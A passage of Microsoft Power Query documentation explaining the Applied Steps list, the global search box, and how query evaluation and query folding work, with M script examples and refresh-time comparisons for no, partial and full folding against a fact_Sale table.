Insights, and Azure Data Factory contains links to important sources of information
about Power Query.

The options in the help tab include links to:

Power Query documentation: Links to the Power Query documentation


Keyboard shortcuts: Links to the keyboard shortcuts article in the Power Query
documentation.
Support: Links to the support website of the Microsoft product that Power Query is
currently running in.
Power Query website: Links to the Power Query website.
Power Query blog: Links to the Power Query blog.
Power Query community: Links to the Power Query community.
Submit an idea: Links to the ideas website of the Microsoft product that Power
Query is currently running in.
Send feedback: Opens a window in Power Query that asks you to rate your
experience with Power Query, and to provide any additional information you
would like to supply.

7 Note

Currently, Azure Analysis Services doesn't contain any inline Power Query help links.
However, you can get help for Power Query M functions. More information is
contained in the next section.

Help for Power Query M functions


In addition to the Power Query help functions listed in the previous sections, you can
also get help for individual M functions from inside the Power Query editor. The
following steps describe how to get to this inline help.

1. With the Power Query editor open, select the insert step button.
2. In the formula bar, enter the name of a function you want to check.
a. If you are using Power Query Desktop, enter an equal sign, a space, and the
name of a function.
b. If you are using Power Query Online, enter the name of a function.
3. Select the properties of the function.
a. If you are using Power Query Desktop, in the Query Settings pane, under
Properties, select All properties.
b. If you are using Power Query Online, in the Query Settings pane, select
Properties.

These steps will open the inline help information for your selected function, and let you
enter individual properties used by the function.

Summary
In this article, you created a series of queries with Power Query that provides a
customer-to-supplier ratio analysis at the country level for the Northwind corporation.

You learned the components of the Power Query user interface, how to create new
queries inside the query editor, reference queries, merge queries, understand the
applied steps section, add new columns, and how to use the data profiling tools to
better understand your data.
Power Query is a powerful tool used to connect to many different data sources and
transform the data into the shape you want. The scenarios outlined in this article are
examples to show you how you can use Power Query to transform raw data into
important actionable business insights.
Using the Applied Steps list
Article • 08/07/2023

The Applied steps list is part of the Query settings pane in Power Query. Any
transformations to your data are displayed in the Applied steps list. For instance, if you
change the first column name, the new column name is displayed in the Applied steps
list as Renamed columns.

Selecting any step displays the results of that particular step, so you can see exactly how
your data changes as you add steps to the query.

Access the Applied steps list


In most cases, the Applied steps list is displayed automatically when you connect to
your data source and open the Power Query editor. However, there may be times when
the Query settings section has been closed, and you need to reopen it.

If you're using Power Query Desktop (Excel, Power BI Desktop, Analysis Services) and the
Query Settings pane is closed, select the View tab from the ribbon, and then select
Query Settings.
The Query Settings pane then opens on the right side with the Applied Steps list.

If you're using Power Query Online (Power BI service, Power Apps, Data Factory
(preview), Microsoft 365 Customer Insights) and the Query settings pane is closed,
select the < icon above Query settings to open the pane.
The Query settings pane then opens on the right side with the Applied steps list.
The following image shows the different parts of the Applied steps list. Currently, not all
of these parts are found in Power Query Desktop. The Applied steps list in Power Query
Desktop only contains the delete step, step name, step description, and step settings
elements. The step icon and query folding indicator are found only in Power Query
Online.

The full list of the step parts are:


Delete step: When a step is selected, the delete icon appears on the left side of the
Applied steps list. If you select the icon, the step is deleted. More information:
Delete step
Step icon: Automatically assigned to the step, based on its type, and can't be
changed by the user. The step icon isn't available in Power Query Desktop.
Step name: A name automatically assigned to the step. The step name can be
changed using the step menu. More information: Rename step
Step description: A description of the step. Typically, no description is added when
the step is created. However, the step description can be added using the step
menu. More information: Edit step names and their descriptions
Step settings: Change any settings that are specific to the selected step. Not all
steps have settings. More information: Edit settings
Query folding indicator: Provides a graphic representation of the query folding
status of the selected step. This indicator isn't available in Power Query Desktop.
More information: Query folding indicators

In Power Query Online, if you hover the mouse cursor over one of the applied steps, an
informational display opens, listing the step name, step label, step description, step
settings, information about the step query folding, and a learn more link to the Query
folding indicators article. For more information about query folding, go to Power Query
query folding. The step label is automatically generated when the step is created, and
indicates the step type, as does the step icon. The step label and the step icon can't be
changed.

Step menu selections


When you right-click on a step in the applied steps list, a step menu pops up. The
following sections describe each of the options available in the step menu.
Edit settings
The Edit settings option lets you change specific settings for each individual step in the
Applied settings list. Not all steps have settings that can be changed. If no settings are
available, this option is grayed out in the step menu. For the steps that do have settings
that can be changed, selecting the Edit settings option brings up the settings page for
that particular step. For example, if the step is for an OData source, the OData source
page is displayed, where you can enter the OData source URL. As another example, if
the step is for a fuzzy cluster column, the Cluster values page is displayed, where you
can change the column to create the fuzzy clusters from.

You can also edit the settings for any step that contains the step settings icon. The two
places where the icon appears are in the Applied steps list and in the informational
display for the step. Just select the icon and the settings page for that particular step is
displayed.

Rename step
To rename a step, right-click the step and select Rename.
Enter in the name you want, and then either select Enter or select away from the step.

Delete step
To delete a step, right-click the step and select Delete.
Alternatively, select the X next to the step.
Delete until end
To delete a series of steps, right-click the first step of the series and select Delete until
end. This action deletes the selected step and all the subsequent steps.
Select Delete in the new window.

The following image shows the Applied steps list after using the Delete until end.
Insert step after
To add a new step, right-click on the last step in the list and select Insert step after.
To insert a new intermediate step, right-click on a step and select Insert step after. Then
select Insert on the new window.

To set a transformation for the new step, select the new step in the list and make the
change to the data. It automatically links the transformation to the selected step.

Move step
To move a step up one position in the list, right-click the step and select Move before.
To move a step down one position in the list, right-click the step and select Move after.
Alternatively, or to move more than a single position, drag and drop the step to the
desired location.
Extract the previous steps into query
You can also separate a series of transformations into a different query. This allows the
query to be referenced for other sources, which can be helpful if you're trying to apply
the same transformation to multiple datasets. To extract all the previous steps into a
new query, right-click the first step you do not want to include in the query and select
Extract Previous.
Name the new query and select OK. To access the new query, navigate to the Queries
pane on the left side of the screen.

Edit step names and their descriptions


To edit the step, right-click the step and select Properties.
In the window, change the step name and description, then select OK to save the
changes.
Adding a description to a step adds a small icon next to the step to denote that the step
has a description. In Power Query Desktop, you can hover over this icon to display the
description as a tooltip.
In Power Query Online, the step description is included in the informational display that
appears when you hover over any of the steps in the applied steps list.


Global search box (Preview)
Article • 07/30/2022

The global search box offers you the ability to search for:

Queries found in your project.


Actions available in your version of Power Query that are commonly found in the
ribbon.
Get data connectors that can also be found through the Get Data dialog box.

The global search box is located at the top center of the Power Query editor. The search
box follows the same design principles that you find in Microsoft Search in Office , but
contextualized to Power Query.

Search results
To make use of the global search box, select the search box or press Alt + Q. Before you
enter anything, you'll be presented with some default options to choose from.
When you start entering something to search for, the results will be updated in real
time, displaying queries, actions, and get data connectors that match the text that
you've entered.

For scenarios where you'd like to see all available options for a given search query, you
can also select the See more results for option. This option is positioned as the last
result of the search box query when there are multiple matches to your query.

Overview of query evaluation and query
folding in Power Query
Article • 02/17/2023

This article provides a basic overview of how M queries are processed and turned into
data source requests.

Power Query M script


Any query, whether created by Power Query, manually written by you in the advanced
editor, or entered using a blank document, consists of functions and syntax from the
Power Query M formula language. This query gets interpreted and evaluated by the
Power Query engine to output its results. The M script serves as the set of instructions
needed to evaluate the query.

 Tip

You can think of the M script as a recipe that describes how to prepare your data.

The most common way to create an M script is by using the Power Query editor. For
example, when you connect to a data source, such as a SQL Server database, you'll
notice on the right-hand side of your screen that there's a section called applied steps.
This section displays all the steps or transforms used in your query. In this sense, the
Power Query editor serves as an interface to help you create the appropriate M script for
the transforms that you're after, and ensures that the code you use is valid.

7 Note

The M script is used in the Power Query editor to:

Display the query as a series of steps and allow the creation or modification of
new steps.
Display a diagram view.
The previous image emphasizes the applied steps section, which contains the following
steps:

Source: Makes the connection to the data source. In this case, it's a connection to a
SQL Server database.
Navigation: Navigates to a specific table in the database.
Removed other columns: Selects which columns from the table to keep.
Sorted rows: Sorts the table using one or more columns.
Kept top rows: Filters the table to only keep a certain number of rows from the top
of the table.

This set of step names is a friendly way to view the M script that Power Query has
created for you. There are several ways to view the full M script. In Power Query, you can
select Advanced Editor in the View tab. You can also select Advanced Editor from the
Query group in the Home tab. In some versions of Power Query, you can also change
the view of the formula bar to show the query script by going into the View tab and
from the Layout group, select Script view > Query script.
Most of the names found in the Applied steps pane are also used as-is in the M
script. Steps of a query are named using something called identifiers in the M language.
Sometimes extra characters are wrapped around step names in M, but these characters
aren’t shown in the applied steps. An example is #"Kept top rows" , which is categorized
as a quoted identifier because of these extra characters. A quoted identifier can be used
to allow any sequence of zero or more Unicode characters to be used as an identifier,
including keywords, whitespace, comments, operators, and punctuators. To learn more
about identifiers in the M language, go to lexical structure.
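
Putting these ideas together, a query with the steps described earlier (Source, Navigation, Removed other columns, Sorted rows, and Kept top rows) might look like the following sketch in the advanced editor. The server, database, table, and column names are hypothetical placeholders; note how the quoted identifier #"Kept top rows" appears in the script while the applied steps pane shows only Kept top rows.

Power Query M

let
    // Source: connect to a SQL Server database (server and database names are placeholders)
    Source = Sql.Database("myServer", "AdventureWorks"),
    // Navigation: navigate to a specific table in the database
    Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}[Data],
    // Removed other columns: keep only the columns of interest
    #"Removed other columns" = Table.SelectColumns(Navigation, {"SalesOrderID", "OrderDate", "TotalDue"}),
    // Sorted rows: sort the table by OrderDate, newest first
    #"Sorted rows" = Table.Sort(#"Removed other columns", {{"OrderDate", Order.Descending}}),
    // Kept top rows: keep only the first 10 rows from the top of the table
    #"Kept top rows" = Table.FirstN(#"Sorted rows", 10)
in
    #"Kept top rows"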

Any changes that you make to your query through the Power Query editor will
automatically update the M script for your query. For example, using the previous image
as the starting point, if you change the Kept top rows step name to be Top 20 rows, this
change will automatically be updated in the script view.
While we recommend that you use the Power Query editor to create all or most of the
M script for you, you can manually add or modify pieces of your M script. To learn more
about the M language, go to the official docs site for the M language.

7 Note

M script, also referred to as M code, is a term used for any code that uses the M
language. In the context of this article, M script also refers to the code found inside
a Power Query query and accessible through the advanced editor window or
through the script view in the formula bar.

Query evaluation in Power Query


The following diagram explores the process that occurs when a query is evaluated in
Power Query.
1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also included, such as credentials and data
source privacy levels.
2. Power Query determines what data needs to be extracted from the data source
and submits a request to the data source.
3. The data source responds to the request from Power Query by transferring the
requested data to Power Query.
4. Power Query receives the incoming data from the data source and does any
transformations using the Power Query engine if necessary.
5. The results derived from the previous point are loaded to a destination.

7 Note

While this example showcases a query with a SQL Database as a data source, the
concept applies to queries with or without a data source.

When Power Query reads your M script, it runs the script through an optimization
process to more efficiently evaluate your query. In this process, it determines which
steps (transforms) from your query can be offloaded to your data source. It also
determines which other steps need to be evaluated using the Power Query engine. This
optimization process is called query folding, where Power Query tries to push as much of
the possible execution to the data source to optimize your query's execution.
) Important

All rules from the Power Query M formula language (also known as the M
language) are followed. Most notably, lazy evaluation plays an important role
during the optimization process. In this process, Power Query understands what
specific transforms from your query need to be evaluated. Power Query also
understands what other transforms don't need to be evaluated because they're not
needed in the output of your query.

Furthermore, when multiple sources are involved, the data privacy level of each
data source is taken into consideration when evaluating the query. More
information: Behind the scenes of the Data Privacy Firewall

The following diagram demonstrates the steps that take place in this optimization
process.

1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also supplied, such as credentials and data
source privacy levels.
2. The Query folding mechanism submits metadata requests to the data source to
determine the capabilities of the data source, table schemas, relationships between
different entities at the data source, and more.
3. Based on the metadata received, the query folding mechanism determines what
information to extract from the data source and what set of transformations need
to happen inside the Power Query engine. It sends the instructions to two other
components that take care of retrieving the data from the data source and
transforming the incoming data in the Power Query engine if necessary.
4. Once the instructions have been received by the internal components of Power
Query, Power Query sends a request to the data source using a data source query.
5. The data source receives the request from Power Query and transfers the data to
the Power Query engine.
6. Once the data is inside Power Query, the transformation engine inside Power
Query (also known as mashup engine) does the transformations that couldn't be
folded back or offloaded to the data source.
7. The results derived from the previous point are loaded to a destination.

7 Note

Depending on the transformations and data source used in the M script, Power
Query determines if it will stream or buffer the incoming data.

Query folding overview


The goal of query folding is to offload or push as much of the evaluation of a query to a
data source that can compute the transformations of your query.

The query folding mechanism accomplishes this goal by translating your M script to a
language that can be interpreted and executed by your data source. It then pushes the
evaluation to your data source and sends the result of that evaluation to Power Query.

This operation often provides a much faster query execution than extracting all the
required data from your data source and running all transforms required in the Power
Query engine.

When you use the get data experience, Power Query guides you through the process
that ultimately lets you connect to your data source. When doing so, Power Query uses
a series of functions in the M language categorized as accessing data functions. These
specific functions use mechanisms and protocols to connect to your data source using a
language that your data source can understand.

However, the steps that follow in your query are the steps or transforms that the query
folding mechanism attempts to optimize. It then checks if they can be offloaded to your
data source instead of being processed using the Power Query engine.

) Important
All data source functions, commonly shown as the Source step of a query, query
the data at the data source in its native language. The query folding mechanism is
applied to all transforms that follow your data source function so that they can be
translated and combined into a single data source query, or into as many
transforms as can be offloaded to the data source.

Depending on how the query is structured, there could be three possible outcomes to
the query folding mechanism:

Full query folding: When all of your query transformations get pushed back to the
data source and minimal processing occurs at the Power Query engine.
Partial query folding: When only a few transformations in your query, and not all,
can be pushed back to the data source. In this case, only a subset of your
transformations is done at your data source and the rest of your query
transformations occur in the Power Query engine.
No query folding: When the query contains transformations that can't be
translated to the native query language of your data source, either because the
transformations aren't supported or the connector doesn't support query folding.
For this case, Power Query gets the raw data from your data source and uses the
Power Query engine to achieve the output you want by processing the required
transforms at the Power Query engine level.

7 Note

The query folding mechanism is primarily available in connectors for structured
data sources such as, but not limited to, Microsoft SQL Server and OData Feed.
During the optimization phase, the engine might sometimes reorder steps in the
query.

Leveraging a data source that has more processing resources and has query folding
capabilities can expedite your query loading times as the processing occurs at the
data source and not at the Power Query engine.

Next steps
For detailed examples of the three possible outcomes of the query folding mechanism,
go to Query folding examples.

For information about query folding indicators found in the Applied Steps pane, go to
Query folding indicators
Power Query query folding
Article • 08/31/2022

This article targets data modelers developing models in Power Pivot or Power BI
Desktop. It describes what Power Query query folding is, and why it's important in your
data model designs. This article also describes the data sources and transformations that
can achieve query folding, and how to determine that your Power Query queries can be
folded—whether fully or partially.

Query folding is the ability for a Power Query query to generate a single query
statement to retrieve and transform source data. The Power Query mashup engine
strives to achieve query folding whenever possible for reasons of efficiency.

Query folding is an important topic for data modeling for several reasons:

Import model tables: Data refresh will take place efficiently for Import model
tables (Power Pivot or Power BI Desktop), in terms of resource utilization and
refresh duration.
DirectQuery and Dual storage mode tables: Each DirectQuery and Dual storage
mode table (Power BI only) must be based on a Power Query query that can be
folded.
Incremental refresh: Incremental data refresh (Power BI only) will be efficient, in
terms of resource utilization and refresh duration. In fact, the Power BI Incremental
Refresh configuration window will notify you of a warning should it determine that
query folding for the table can't be achieved. If it can't be achieved, the goal of
incremental refresh is defeated. The mashup engine would then be required to
retrieve all source rows, and then apply filters to determine incremental changes.

Query folding may occur for an entire Power Query query, or for a subset of its steps.
When query folding cannot be achieved—either partially or fully—the Power Query
mashup engine must compensate by processing data transformations itself. This process
can involve retrieving source query results, which for large datasets is very resource
intensive and slow.

We recommend that you strive to achieve efficiency in your model designs by ensuring
query folding occurs whenever possible.

Sources that support folding


Most data sources that have the concept of a query language support query folding.
These data sources can include relational databases, OData feeds (including SharePoint
lists), Exchange, and Active Directory. However, data sources like flat files, blobs, and
web typically do not.

Transformations that can achieve folding


Relational data source transformations that can be query folded are those that can be
written as a single SELECT statement. A SELECT statement can be constructed with
appropriate WHERE, GROUP BY, and JOIN clauses. It can also contain column
expressions (calculations) that use common built-in functions supported by SQL
databases.

Generally, the following list describes transformations that can be query folded.

Removing columns.

Renaming columns (SELECT column aliases).

Filtering rows, with static values or Power Query parameters (WHERE clause
predicates).

Grouping and summarizing (GROUP BY clause).

Expanding record columns (source foreign key columns) to achieve a join of two
source tables (JOIN clause).

Non-fuzzy merging of fold-able queries based on the same source (JOIN clause).

Appending fold-able queries based on the same source (UNION ALL operator).

Adding custom columns with simple logic (SELECT column expressions). Simple
logic implies uncomplicated operations, possibly including the use of M functions
that have equivalent functions in the SQL data source, like mathematic or text
manipulation functions. For example, the following expression returns the year
component of the OrderDate column value as a numeric value.

Power Query M

Date.Year([OrderDate])

Pivoting and unpivoting (PIVOT and UNPIVOT operators).
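
To illustrate how these transformations combine, the following minimal sketch chains several foldable steps against a hypothetical SQL Server source (the server, database, table, and column names are placeholders, not part of the original example). Each step can typically be translated into clauses of the single SELECT statement described above.

Power Query M

let
    // Connect to a hypothetical SQL Server database (placeholder names)
    Source = Sql.Database("ServerName", "AdventureWorks"),
    Orders = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}[Data],
    // Removing columns folds to the SELECT column list
    #"Selected columns" = Table.SelectColumns(Orders, {"SalesOrderID", "OrderDate", "TotalDue"}),
    // Filtering rows folds to a WHERE clause predicate
    #"Filtered rows" = Table.SelectRows(#"Selected columns", each [TotalDue] > 1000),
    // A custom column with simple logic folds to a SELECT column expression
    #"Added order year" = Table.AddColumn(#"Filtered rows", "OrderYear", each Date.Year([OrderDate]), Int64.Type),
    // Grouping and summarizing folds to a GROUP BY clause
    #"Grouped rows" = Table.Group(#"Added order year", {"OrderYear"}, {{"Total Due", each List.Sum([TotalDue]), type number}})
in
    #"Grouped rows"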

Transformations that prevent folding


Generally, the following list describes transformations that prevent query folding. This
list isn't intended to be an exhaustive list.

Merging queries based on different sources.

Appending (union-ing) queries based on different sources.

Adding custom columns with complex logic. Complex logic implies the use of M
functions that have no equivalent functions in the data source. For example, the
following expression formats the OrderDate column value as a text value.

Power Query M

Date.ToText([OrderDate], "yyyy")

Adding index columns.

Note that when a Power Query query encompasses multiple data sources,
incompatibility of data source privacy levels can prevent query folding from taking
place. For more information, see the Power BI Desktop privacy levels article.
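
As a hedged example of the first item in this list, the following sketch merges a SQL Server table with a local CSV file (the file path and column names are hypothetical). Because the two queries come from different sources, the merge can't be folded, and the join is evaluated locally by the mashup engine.

Power Query M

let
    SqlSource = Sql.Database("ServerName", "AdventureWorks"),
    Products = SqlSource{[Schema = "Production", Item = "Product"]}[Data],
    // A flat file has no query language, so nothing from this query can fold
    CategoriesCsv = Csv.Document(File.Contents("C:\Data\Categories.csv"), [Delimiter = ",", Encoding = 65001]),
    Categories = Table.PromoteHeaders(CategoriesCsv, [PromoteAllScalars = true]),
    // Merging queries based on different sources prevents folding:
    // the join runs in the Power Query engine, not in the SQL database
    Merged = Table.NestedJoin(Products, {"ProductSubcategoryID"}, Categories, {"SubcategoryID"}, "Category", JoinKind.LeftOuter)
in
    Merged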

Determine when a query can be folded


In the Power Query Editor window, it's possible to determine when a Power Query query
can be folded. In the Query Settings pane, when you right-click the last applied step, if
the View Native Query option is enabled (not greyed out), then the entire query can be
folded.
7 Note

The View Native Query option is only available for certain relational DB/SQL
generating connectors. It doesn't work for OData based connectors, for example,
even though there is folding occurring on the backend. The Query Diagnostics
feature is the best way to see what folding has occurred for non-SQL connectors
(although the steps that fold aren't explicitly called out—you just see the resulting
URL that was generated).

To view the folded query, select the View Native Query option. You're then
presented with the native query that Power Query will use to source the data.
If the View Native Query option isn't enabled (greyed out), this is evidence that not all
query steps can be folded. However, it could mean that a subset of steps can still be
folded. Working backwards from the last step, you can check each step to see if the
View Native Query option is enabled. If so, you've identified the point in the sequence
of steps where query folding could no longer be achieved.
Next steps
For more information about query folding and related articles, check out the following
resources:

Overview of query evaluation and query folding in Power Query


Query folding guidance in Power BI Desktop
Query folding examples
Query folding indicators
Query plan for Power Query
Query folding on native queries
Query folding examples
Article • 08/31/2022

This article provides some example scenarios for each of the three possible outcomes
for query folding. It also includes some suggestions on how to get the most out of the
query folding mechanism, and the effect that it can have in your queries.

The scenario
Imagine a scenario where, using the Wide World Importers database for Azure Synapse
Analytics SQL database, you're tasked with creating a query in Power Query that
connects to the fact_Sale table and retrieves the last 10 sales with only the following
fields:

Sale Key
Customer Key
Invoice Date Key
Description
Quantity

7 Note

For demonstration purposes, this article uses the database outlined on the tutorial
on loading the Wide World Importers database into Azure Synapse Analytics. The
main difference in this article is the fact_Sale table only holds data for the year
2000, with a total of 3,644,356 rows.

While the results might not exactly match the results that you get by following the
tutorial from the Azure Synapse Analytics documentation, the goal of this article is
to showcase the core concepts and impact that query folding can have in your
queries.
This article showcases three ways to achieve the same output with different levels of
query folding:

No query folding
Partial query folding
Full query folding

No query folding example

) Important

Queries that rely solely on unstructured data sources or that don't have a compute
engine, such as CSV or Excel files, don't have query folding capabilities. This means
that Power Query evaluates all the required data transformations using the Power
Query engine.

After connecting to your database and navigating to the fact_Sale table, you select the
Keep bottom rows transform found inside the Reduce rows group of the Home tab.

After selecting this transform, a new dialog appears. In this new dialog, you can enter
the number of rows that you'd like to keep. For this case, enter the value 10, and then
select OK.
 Tip

For this case, performing this operation yields the result of the last ten sales. In
most scenarios, we recommend that you define more explicit logic that determines
which rows are considered last, for example by applying a sort operation to the table.

Next, select the Choose columns transform found inside the Manage columns group of
the Home tab. You can then select the columns you want to keep from your table and
remove the rest.

Lastly, inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice
Date Key , Description , and Quantity columns, and then select OK.
The following code sample is the full M script for the query you created:

Power Query M

let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Kept bottom rows" = Table.LastN(Navigation, 10),
#"Choose columns" = Table.SelectColumns(#"Kept bottom rows", {"Sale Key",
"Customer Key", "Invoice Date Key", "Description", "Quantity"})
in
#"Choose columns""

No query folding: Understanding the query evaluation


Under Applied steps in the Power Query editor, you’ll notice that the query folding
indicators mark Kept bottom rows and Choose columns as steps that will be
evaluated outside the data source or, in other words, by the Power Query engine.
You can right-click the last step of your query, the one named Choose columns, and
select the option that reads View Query plan. The goal of the query plan is to provide
you with a detailed view of how your query is run. To learn more about this feature, go
to Query plan.

Each box in the previous image is called a node. A node represents the operation
breakdown to fulfill this query. Nodes that represent data sources, such as SQL Server in
the example above and the Value.NativeQuery node, represent which part of the query
is offloaded to the data source. The nodes highlighted in the rectangle in the previous
image, in this case Table.LastN and Table.SelectColumns, are evaluated by the Power
Query engine. These two nodes represent the two transforms that you added, Kept
bottom rows and Choose columns. The remaining nodes represent operations that
happen at the data source level.

To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This data source request is in the native language of your data source. For this case, that
language is SQL and this statement represents a request for all the rows and fields from
the fact_Sale table.

Consulting this data source request can help you better understand the story that the
query plan tries to convey:

Sql.Database : This node represents the data source access. Connects to the
database and sends metadata requests to understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. In this case, that represents all records and fields (columns)
from the fact_Sale table. For this scenario, this case is undesirable, as the table
contains millions of rows and the interest is only in the last 10.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.
Table.SelectColumns : Power Query will use the output of the Table.LastN node
and apply a new transform called Table.SelectColumns , which selects the specific
columns that you want to keep from a table.

For its evaluation, this query had to download all rows and fields from the fact_Sale
table. This query took an average of 6 minutes and 1 second to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).

Partial query folding example


After connecting to the database and navigating to the fact_Sale table, you start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.

Inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice Date
Key , Description , and Quantity columns and then select OK.
You now create logic that will sort the table to have the last sales at the bottom of the
table. Select the Sale Key column, which is the primary key and incremental sequence
or index of the table. Sort the table using only this field in ascending order from the
context menu for the column.

Next, select the table contextual menu and choose the Keep bottom rows transform.
In Keep bottom rows, enter the value 10, and then select OK.

The following code sample is the full M script for the query you created:

Power Query M

let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Ascending}}),
#"Kept bottom rows" = Table.LastN(#"Sorted rows", 10)
in
#"Kept bottom rows"

Partial query folding example: Understanding the query evaluation
Checking the applied steps pane, you notice that the query folding indicators are
showing that the last transform that you added, Kept bottom rows , is marked as a step
that will be evaluated outside the data source or, in other words, by the Power Query
engine.

You can right-click the last step of your query, the one named Kept bottom rows , and
select the Query plan option to better understand how your query might be evaluated.
Each box in the previous image is called a node. A node represents every process that
needs to happen (from left to right) in order for your query to be evaluated. Some of
these nodes can be evaluated at your data source while others, like the node for
Table.LastN , represented by the Kept bottom rows step, are evaluated using the Power
Query engine.

To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows, with only the requested
fields from the fact_Sale table ordered by the Sale Key field.

Consulting this data source request can help you better understand the story that the
full query plan tries to convey. The order of the nodes is a sequential process that starts
by requesting the data from your data source:

Sql.Database : Connects to the database and sends metadata requests to
understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. For this case, that represents all records, with only the
requested fields from the fact_Sale table in the database sorted in ascending
order by the Sale Key field.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.

For its evaluation, this query had to download all rows and only the required fields from
the fact_Sale table. It took an average of 3 minutes and 4 seconds to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Full query folding example
After connecting to the database and navigating to the fact_Sale table, start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.

In Choose columns, select the Sale Key , Customer Key , Invoice Date Key , Description ,
and Quantity columns, and then select OK.
You now create logic that will sort the table to have the last sales at the top of the table.
Select the Sale Key column, which is the primary key and incremental sequence or
index of the table. Sort the table only using this field in descending order from the
context menu for the column.

Next, select the table contextual menu and choose the Keep top rows transform.
In Keep top rows, enter the value 10, and then select OK.

The following code sample is the full M script for the query you created:

Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Descending}}),
#"Kept top rows" = Table.FirstN(#"Sorted rows", 10)
in
#"Kept top rows"

Full query folding example: Understanding the query evaluation
When checking the applied steps pane, you'll notice that the query folding indicators
are showing that the transforms that you added, Choose columns, Sorted rows, and
Kept top rows, are marked as steps that will be evaluated at the data source.

You can right-click the last step of your query, the one named Kept top rows, and select
the option that reads Query plan.
Selecting View details in the Value.NativeQuery node shows the exact request that is
sent to your data source. This request is in the native language of your data source. For
this case, that language is SQL, and the statement represents a request for only the
required fields and the top 10 records of the fact_Sale table, sorted in descending order
by the Sale Key field.

Consulting this data source query can help you better understand the story that the full
query plan tries to convey:

Sql.Database : Connects to the database and sends metadata requests to

understand its capabilities.


Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. For this case, that represents a request for only the top 10
records of the fact_Sale table, with only the required fields after being sorted in
descending order using the Sale Key field.

7 Note

While there's no clause that can be used to SELECT the bottom rows of a table in
the T-SQL language, there's a TOP clause that retrieves the top rows of a table.
For its evaluation, this query only downloads 10 rows, with only the fields that you
requested from the fact_Sale table. This query took an average of 31 seconds to be
processed in a standard instance of Power BI dataflows (which accounts for the
evaluation and loading of data to dataflows).

Performance comparison
To better understand the effect that query folding has on these queries, you can refresh
your queries, record the time it takes to fully refresh each query, and compare them. For
simplicity, this article provides the average refresh timings captured using the Power BI
dataflows refresh mechanic while connecting to a dedicated Azure Synapse Analytics
environment with DW2000c as the service level.

The refresh time for each query was as follows:

Example Label Time in seconds

No query folding None 361

Partial query folding Partial 184

Full query folding Full 31

It's often the case that a query that fully folds back to the data source outperforms
similar queries that don't completely fold back to the data source. There could be many
reasons why this is the case. These reasons range from the complexity of the transforms
that your query performs, to the query optimizations implemented at your data source,
such as indexes and dedicated computing, and network resources. Still, there are two
specific factors that query folding tries to minimize, both of which affect the performance
of your queries in Power Query:

Data in transit
Transforms executed by the Power Query engine

The following sections explain the effect that these two factors have on the previously
mentioned queries.

Data in transit
When a query gets executed, it tries to fetch the data from the data source as one of its
first steps. What data is fetched from the data source is defined by the query folding
mechanism. This mechanism identifies the steps from the query that can be offloaded to
the data source.

The following table lists the number of rows requested from the fact_Sale table of the
database. The table also includes a brief description of the SQL statement sent to
request such data from the data source.

Example                 Label     Rows requested   Description

No query folding        None      3,644,356        Request for all fields and all records from the fact_Sale table

Partial query folding   Partial   3,644,356        Request for all records, but only the required fields from the fact_Sale table after it was sorted by the Sale Key field

Full query folding      Full      10               Request for only the required fields and the TOP 10 records of the fact_Sale table after being sorted in descending order by the Sale Key field
When requesting data from a data source, the data source needs to compute the results
for the request and then send the data to the requestor. While the computing resources
have already been mentioned, moving the data over the network from the data source to
Power Query, and then having Power Query receive the data and prepare it for the
transforms that happen locally, can also take considerable time depending on the size of
the data.

For the showcased examples, Power Query had to request over 3.6 million rows from the
data source for the no query folding and partial query folding examples. For the full
query folding example, it only requested 10 rows. For the fields requested, the no query
folding example requested all the available fields from the table. Both the partial query
folding and the full query folding examples only submitted a request for exactly the
fields that they needed.

U Caution

We recommend that you implement incremental refresh solutions that leverage


query folding for queries or entities with large amounts of data. Different product
integrations of Power Query implement timeouts to terminate long running
queries. Some data sources also implement timeouts on long running sessions,
trying to execute expensive queries against their servers. More information: Using
incremental refresh with dataflows and Incremental refresh for datasets

Transforms executed by the Power Query engine


This article showcased how you can use the Query plan to better understand how your
query might be evaluated. Inside the query plan, you can see the exact nodes of the
transform operations that will be performed by the Power Query engine.

The following table showcases the nodes from the query plans of the previous queries
that would have been evaluated by the Power Query engine.

Example Label Power Query engine transform nodes

No query folding None Table.LastN , Table.SelectColumns

Partial query folding Partial Table.LastN

Full query folding Full —

For the examples showcased in this article, the full query folding example doesn't
require any transforms to happen inside the Power Query engine as the required output
table comes directly from the data source. In contrast, the other two queries required
some computation to happen at the Power Query engine. Because of the amount of
